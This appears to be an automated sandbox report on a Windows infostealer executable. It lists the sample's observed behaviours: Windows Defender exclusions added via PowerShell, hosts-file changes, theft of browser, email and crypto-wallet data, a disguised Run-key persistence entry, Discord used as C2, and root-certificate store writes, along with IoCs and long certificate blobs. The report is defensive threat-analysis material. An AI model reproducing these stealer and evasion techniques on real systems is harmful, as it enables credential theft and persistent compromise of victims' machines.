758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
08/06/2024, 13:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Size

11.8MB
MD5

44d806942d0bbc5f4302867243b66a18
SHA1

4405cd3f84680d4888ef7f9fb0a651c82b3573b9
SHA256

758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5
SHA512

661aeb2b1037c1ef446056f8f71a0d4f2eba8702072b931c87604ac58f408d93c1fcb2cc04b1fceb312318361b3c88e3e94c8ab0e318e4e8a669f81950a5c6f9
SSDEEP

98304:5pmhaWByjQAidj9ZMDvcpOnUxBEtg71fnhfagct8zaqz/8:5d+yjQLKvcpPxCa1VT8

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1996	powershell.exe
4904	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	discord.com
14	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
4	api.ipify.org
7	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4944	wmic.exe
4696	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	8	Go-http-client/1.1

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1996	powershell.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1996	powershell.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
3984	powershell.exe
3984	powershell.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
1856	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
